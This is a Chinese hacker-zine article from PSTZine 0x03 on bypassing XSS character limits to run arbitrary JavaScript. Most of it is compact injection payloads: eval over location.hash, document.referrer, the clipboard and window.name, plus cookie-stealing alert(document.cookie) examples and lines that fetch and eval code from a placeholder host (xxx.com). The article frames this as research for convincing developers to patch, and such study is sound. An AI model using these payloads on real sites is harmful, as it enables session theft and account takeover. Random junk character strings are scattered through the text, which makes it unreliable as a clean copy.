[PSTZine 0x03][0x04][突破XSS字符数量限制执行任意JS代码]

admin

                           ==Ph4nt0m Security Team==
. S4 @) D& |4 M8 O: |  f
                       Issue 0x03, Phile #0x04 of 0x07
3 ]0 o# F. l( M- B

|=---------------------------------------------------------------------------=|
; f( \2 Z. |/ F; Z|=-------------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-----------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=------------------------=[      By luoluo     ]=---------------------------=|
! V5 f) j7 t2 k: P|=----------------------=[   <luoluo#ph4nt0m.org>  ]=------------------------=|
|=----------------------=[    <luoluo#80sec.com>   ]=------------------------=|
! J8 ~( }) u( r" H1 x; Q|=---------------------------------------------------------------------------=|

" o* w& m- G' k# c
[目录]
3 {2 H( r7 X6 i) U
1. 综述
2. 突破方法
; U! K! |9 B. y9 o' `' u# `  2.1 利用HTML上下文中其他可以控制的数据
3 b5 ^) U( O$ l  2.2 利用URL中的数据
2 A1 B( r) i, @% ?. Q; g  2.3 JS上下文的利用
( X& ]' V0 k- A4 h  2.4 利用浏览器特性在跨域的页面之间传递数据
2 G. y! J) K. [9 s; {: I* e: d" t    2.4.1 document.referrer
    2.4.2 剪切板clipboardData
/ c2 l+ e5 |, u' r0 H' S& p    2.4.3 窗口名window.name
  2.5 以上的方式结合使用
& x9 w" z/ V6 m/ a3. 后记
+ S  V' K3 q* K8 o5 o& q. S4. 参考
; E; W) p6 I% N4 D6 c

一、综述
; Q, |, n$ u: F" x/ b
) n! u3 b6 |+ }: \3 k6 g* a' B8 A; I9 N    有些XSS漏洞由于字符数量有限制而没法有效的利用，只能弹出一个对话框来YY，本文主
要讨论如何突破字符数量的限制进行有效的利用，这里对有效利用的定义是可以不受限制执
4 b/ K0 L9 z' n2 m3 y行任意JS。对于跨站师们来说，研究极端情况下XSS利用的可能性是一种乐趣；对于产品安全
人员来说，不受限制的利用的可能是提供给开发人员最有力的证据，要求他们重视并修补这些
极端情况下的XSS漏洞。

3 I( T4 q2 {! m' m) r3 c- a    突破的方法有很多种，但是突破的思想基本都一样，那就是执行可以控制的不受限制的数
据。
/ R4 m; E! A" ^+ ~2 i( K, Q

. n4 @1 U% k6 {& d& p, d) v6 w二、突破方法
$ r0 P. ?- O' T" |3 K
2.1 利用HTML上下文中其他可以控制的数据
$ K7 A& `: U, ~  S' C0 X& n) A2 Q
    如果存在XSS漏洞的页面HTML上下文还有其他可以控制的数据，那么可以通过JS获得该数
据通过eval或者document.write/innerHTML等方式执行该数据，从而达到突破XSS字符数量限
: i4 |/ F, D5 _5 M( c0 D制的目的，下面例子假设div元素的内部数据可以控制，但是该数据已经被HTML编码过：
+ G, G( D0 [. ~: B" z
6 ~' r. z9 U; W  y1 \; F--code-------------------------------------------------------------------------
<div id="x">可控的安全的数据</div>
9 c: U# w5 H1 _7 P* X' y<limited_xss_point>alert(/xss/);</limited_xss_point>
-------------------------------------------------------------------------------
& P4 g* h/ `/ u9 W: g5 p4 Q( N6 S: |
    由于XSS点有字符数量限制，所以这里只能弹框，那么我们可以把XSS的Payload通过escape
编码后作为安全的数据，输出到可控的安全数据位置，然后在XSS点执行可控的安全数据：
3 l* [! ~% R. c8 x7 i
0 G2 R+ |' a; \1 a  o" z--code-------------------------------------------------------------------------
4 v! G* N/ T* F<div id="x">alert%28document.cookie%29%3B</div>
; P9 u/ L3 g) ]9 ?! |# g<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
-------------------------------------------------------------------------------

' F, C5 Y  O6 x) e' v长度：28 + len(id)
+ _& h; A0 `; R
    由于x内部的数据没有字符数量的限制，那么从而可以达到执行任意JS的目的。

0 H* ~  f. U; }9 W2 T$ w1 M
6 @! u: r5 x, q( S2 C2.2 利用URL中的数据
0 j, O* {& t+ `! p. x2 f% p
/ y; E5 ~7 K7 H: G6 z. g. e" a    如果页面里不存在上一节所说的可控HTML上下文数据怎么办？有些数据是我们无条件可
$ c$ i+ F. e' c* h+ z控的，第一个想到的就是URL，通过在URL的尾部参数构造要执行的代码，然后在XSS点通过
document.URL/location.href等方式获得代码数据执行，这里假设代码从第80个字符开始到
8 K- |$ E$ }# E最后：
; E) ?" f0 N5 j( M, _  a
& r1 s: `$ r" G2 R0 l: e7 \, v--code-------------------------------------------------------------------------
9 v/ H/ s; {( H; [* X  }" N. Q. ghttp://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)
6 b+ f$ d2 T: F* C$ R
" i9 b0 P; Z$ G6 Y% n: D7 B<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
$ A+ E* b- C0 U6 s+ @-------------------------------------------------------------------------------
! @8 a5 j# Q" S, i( y# i
长度：30
) J6 H; u+ ]4 b, j+ z
--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
: _0 j& i/ K( ~1 `0 k-------------------------------------------------------------------------------

长度：31
. X2 I8 U& w, m8 x
( U6 r- P. O% {, L; O    上面两个例子对比，前一个例子更短，那么有没有办法更短呢？通过查阅JavaScript手册
的String的方法可以发现，切割字符串有一个更短的函数slice，5个字符比substr还要短一个
字符：
& Z+ a" S6 O6 _" V* }
--code-------------------------------------------------------------------------
0 r+ k0 V1 I8 j; M5 N& B<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
1 u. S  H' u4 M  [1 b-------------------------------------------------------------------------------
4 _: ^8 p$ Z9 T3 W4 ~3 C/ _6 B
7 S0 S3 N1 ^& n长度：29
! @9 ?3 I) l8 ?0 |) n
--code-------------------------------------------------------------------------
7 I( Q/ W, H5 D<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
1 B) p; o8 _/ ]% G-------------------------------------------------------------------------------

3 q! M* r+ y, g/ t8 V长度：30

/ ^' Y3 ]) _! g0 O6 z- }& s    那么还有没有办法更短呢？答案是YES，查阅一下MSND里的location对象的参考你会发现
有个hash成员，获取#之后的数据，那么我们可以把要执行的代码放在#后面，然后通过hash获
7 u% v" e; U2 E% J1 o得代码执行，由于获得的数据是#开头的，所以只需要slice一个字符就可以拿到代码：

) J  h& Y: A% [; j) P- a% E( c; P--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)
9 A1 [: G, {6 B1 v! r5 T
<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
-------------------------------------------------------------------------------

长度：29

    这样比上面的例子又少了一个字符。那么还可以更短么？
/ H( D  f3 e. {: s( K
8 m& G4 {7 [* `* a
2.3 JS上下文的利用
2 y# E- z, q3 r$ \8 h
2 h2 V6 M8 M3 A+ S  _    为什么我如此痛苦？那是因为JS和DHTML的方法名和属性名太长！瞧瞧这些“糟糕”的名字：

5 u5 U1 w, D$ @7 U9 N8 xString.fromCharCode
+ D6 ]7 l) A, _. x4 c3 z% Z- K0 rgetElementById
getElementsByTagName
document.write
XMLHTTPRequest
...

/ o. V6 r! h* K. ~    就连开发人员也不愿意多写一次，于是很多站点的前端开发工程师们封装了各式各样的
简化函数，最经典的例子就是：

% z- S. [+ Z# _3 f- q+ h3 ?9 q8 b--code-------------------------------------------------------------------------
" b  L/ A& ?  ^4 N% K% gfunction $(id) {
9 j4 o$ \5 \8 z6 G$ ]" v9 `        return document.getElementById(id);
- {  ]- K0 E* D}
# A4 P! t, l) {0 P-------------------------------------------------------------------------------

    这些函数同样可以为我们所用，用来缩短我们的Payload的长度。不过上面这个例子不是
最短的，IE和FF都支持直接通过ID来引用一个元素。有些函数可以直接用来加载我们的代码：

--code-------------------------------------------------------------------------
3 t* T6 X. h5 N* I2 S6 }; R6 Mfunction loads(url) {
        ...
        document.body.appendChild(script);
}
: [& K! I/ i3 O& L# j
; L$ N3 E: \  {( X" a<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
-------------------------------------------------------------------------------

) C9 G  l& `1 }' t长度：len(函数名) + len(url) + 5
# \4 |0 E+ L5 M, k- o
    当然你的url则是越短越好哦！有些函数则会帮我们去作HTTP请求：
6 Z: ?6 T2 y' I: s
--code-------------------------------------------------------------------------
function get(url) {
        ...
5 d: T2 a7 q2 U. Q        return x.responseText;
}

<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
$ K; d! v6 c- u% u/ c, I1 |. T-------------------------------------------------------------------------------

- s/ a$ z4 g1 ^* x: i长度：len(函数名) + len(url) + 11
6 X: q+ \7 Z7 i1 X- F
    道哥则提出有些流行的JS的开发框架也封装了大量功能强劲的库可供调用，比如：

JQuery
0 [. P7 W+ r9 ], @5 ^YUI
...

    综上所述，我们可以通过分析JS上下文现有的框架、对象、类、函数来尽可能的缩短我
. M5 _/ s4 a: F6 `: }们的代码，进而突破长度限制执行任意代码。

0 I0 D4 Q& i0 ^3 w# V/ N& }" N
$ |5 y* F8 x/ B3 Q2.4 利用浏览器特性在跨域的页面之间传递数据
2 h& v4 P/ Q8 [; F/ M
9 |3 y1 k. ]: x- n; w    虽然有同源策略的限制，浏览器的功能设计上仍然保留了极少数的可以跨域传递数据的
8 G$ R) e7 d) _1 j# p8 A方法，我们可以利用这些方法来跨页面传递数据到被XSS的域的页面去执行。
- H7 `6 d  {- z8 G
2.4.1 document.referrer

    攻击者可以在自己的域上构造页面跳转到被XSS页面，在自己域上的页面的url里带了
. I: ?; Y' Z' N  N3 nPayload，被XSS的页面通过referrer获取相关代码执行。

攻击者构造的的页面：
2 ^9 x6 j$ W7 |3 ~* P# G8 y
--code-------------------------------------------------------------------------
3 h7 m/ p" U# i  H+ Rhttp://www.a.com/attack.html?...&alert(document.cookie)

$ w7 k4 W, j  Z3 z- W9 B) s<a href="http://www.xssedsite.com/xssed.php">go</a>
-------------------------------------------------------------------------------
. g; ]9 I. I: ~, \5 J6 b" w8 e' C6 a
  f; w; v% b6 c% p; y被XSS的页面：

--code-------------------------------------------------------------------------
+ s7 K  b. ?5 G* Q<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
7 B3 g' Z5 G. |5 F7 u+ |-------------------------------------------------------------------------------

) Q  Q3 R, i$ F$ J3 g6 ^& E! |长度：34

8 K% Y) \4 f- C+ U% c    这种方式利用上还有一些问题，如果使用location.href或者<meta http-equiv=refresh>
  T* D) E. _. N" F7 o实现的自动跳转，在IE里被攻击页面拿不到referrer，而FF则可以。QZ建议用表单提交的方式
$ }$ x8 v) T' H* a/ J: y9 S比较好，我测试了下，果然通用，FF/IE都可以成功获取referrer：
9 f  j4 G! f; r& J
# y) d! M% k( B, \$ x" N0 B' G6 ^--code-------------------------------------------------------------------------
<script type="text/javascript">
, }3 Z% E) f  M<!--
: u, Z0 |: w! O/ M8 `window.onload = function(){
        var f = document.createElement("form");
        f.setAttribute("method", "get");
% Q3 T! G& C6 O9 B( X* C        f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
        document.body.appendChild(f);
- j5 b# ]9 R; z& ?; x        f.submit();
};
//-->
5 n, P. o9 R8 ]" j</script>
-------------------------------------------------------------------------------
5 L* D& F9 k6 {: g

5 C- }( r+ M! U" j3 q8 O1 v2.4.2 剪切板clipboardData
( V/ C6 Q; y( f, z/ ~6 I* l
    攻击者在自己域的页面上通过clipboardData把Payload写入剪切板，然后在被XSS页面获
取并执行该数据。

% y* ^. K& [7 ^: k& U) D! E攻击者构造的页面：
4 L0 V) s( X$ c3 y
--code-------------------------------------------------------------------------
<script>
: l0 X2 u* P0 J) Y) d/ hclipboardData.setData("text", "alert(document.cookie)");
) X0 {  i/ s6 d7 o: f</script>
-------------------------------------------------------------------------------

被XSS的页面：

4 Q1 Y" ]8 U! T3 t7 j  `) V--code-------------------------------------------------------------------------
<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
$ d; _* k6 a3 ?* w-------------------------------------------------------------------------------

! K$ {( a5 Y( i2 N$ D" {长度：36

    这种方式只适用于IE系列，并且在IE 7及以上版本的浏览器会有安全提示。


2.4.3 窗口名window.name

5 m5 T) N' \' Y    这是一个很少被用到的特性，在研究同源策略时就注意过这个属性，它是可以跨域传递数
据的，但是这个特性本身并不是漏洞。

    如果仔细研究过window.open这个方法，会发现一个不常用的第二个参数，这个则是设置
窗口名，用于指定target窗口，如果不存在的话则创建新的子窗口，并设置子窗口的name。当
5 L4 S! B, C6 _' W' Z) n我想打搜window.open时一阵狂喜，喜的是window.name这个属性是window对象的成员，那么只
7 a1 J' I' ~+ T4 g需要name就可以引用该属性，但是测试时却发现window.open方法对于第二个参数进行了严格
的检查，只允许数字字母以及下划线的组合，禁止特殊字符进入，那么这种方式就没法写入JS
2 {" i) W8 P) s. r或者VBS。

* c% Z0 `' x, u1 x    但是经过测试发现我们可以通过window.name直接设置当前窗口的name则没有特殊字符
限制，然后直接跳转到被XSS的页面，通过name属性传递Payload过去执行：
; |3 Z) n3 h" K7 S3 J# _7 j
  Q. C) M5 W8 m5 I4 X* c6 }" P  z攻击者构造的页面：

) e  S9 R7 @+ S) ~--code-------------------------------------------------------------------------
0 i% O9 X! B$ ~9 `' |<script>
window.name = "alert(document.cookie)";
) G( Z" H' @- c& B/ y( tlocaton.href = "http://www.xssedsite.com/xssed.php";
</script>
-------------------------------------------------------------------------------
  T' T* \& l! p, M3 G5 J$ K" v% U
被XSS的页面：
) p: P8 j' }: R5 d; q- p3 g
& n% h& Z* s' w6 M/ b: g--code-------------------------------------------------------------------------
) D) n# W4 n5 f! A<limited_xss_point>eval(name);</limited_xss_point>
) E0 p4 H  V' N0 F* o. V. c-------------------------------------------------------------------------------
4 J# @8 Q- k8 Z* o- B8 ^$ h
长度：11
2 P8 H. c6 V2 r' \/ Z
    这个长度可以说是短到极致了，并且这个方法IE/FF都可以很好的支持，是个非常有意思
的技巧，这个技巧的发现也是促成本文的直接原因。
8 B6 a, E  t) ^0 d+ a( W2 \
" Y5 M9 l, q9 l( S" b; _    window.name的特性还有其他一些有趣的应用方式，这个方面的话题以后可以专门写篇文
章来探讨。
" @+ W- O$ A! w/ f( U& V! x9 X3 }
; n1 `/ ~5 Z7 P* Z1 p  e9 H
  G- u/ M' n* a$ P+ p, ?! |2.5 以上的方式结合使用
+ M* |( I7 Q) e4 `! Q- S# G  l% k! x
9 m" ]: H4 H: K( p0 R9 ~    以上的方式结合使用，一般情况下会使得长度更长，但是也不排除在某些变态的过滤情况
! s2 D1 A9 B& ~; J6 A) J中，灵活的组合上面的方法可能会起到奇效。
1 T& F. a. z& x. B: T; l( D
5 S: V8 ^2 }; ~0 L4 |2 I
三、后记

+ U7 J; H: g+ y' S$ \    JS非常灵活，所以方法肯定不限于这些，在具体的问题的分析和研究中，可以获得很多的
乐趣，并且对JS以及浏览器本身有了更深的认识，如果您有巧妙的技巧或者新奇的构思，欢迎
- z4 o6 P' _" c( M2 L和我交流！
5 Z! w3 ~) ]/ G+ a. W0 x4 [
    感谢axis*刺*大风*道哥、rayh4c*QZ*茄子为本文提出的宝贵意见！

% }, t. V" ~6 b; _    本文是纯粹的技术探讨，请勿用于非法用途！

: z; u2 ]2 p, g
四、参考
' c  h8 u) R& M/ d/ a3 J0 j
http://msdn.microsoft.com/en-us/library/aa155073.aspx

& F' n2 B, a" j2 C( u6 j# {% r-EOF-